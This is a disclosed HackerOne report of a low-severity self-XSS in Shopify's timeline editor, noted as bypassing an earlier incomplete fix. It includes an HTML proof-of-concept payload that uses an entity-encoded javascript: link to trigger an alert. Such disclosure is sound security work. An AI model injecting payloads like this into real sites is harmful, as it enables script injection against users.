Timeline Editor Self-XSS (Previous Fix #738072 Incomplete)

Disclosed: 2020-03-16 08:32:02 By mosuan To shopify

Low

Vulnerability Details

1.Consistent steps 2.poc: `<img src=1111111><img src=1111111><a href="javascript:alert&#40/1/&#41">axxx</a><svg></svg><img src=1>` 3. {F656339} ## Impact admin

Actions

View on HackerOne

Report Stats

Report ID: 755679
State: Closed
Substate: resolved
Upvotes: 35

Timeline Editor Self-XSS (Previous Fix #738072 Incomplete)

Vulnerability Details

Actions

Report Stats

Share this report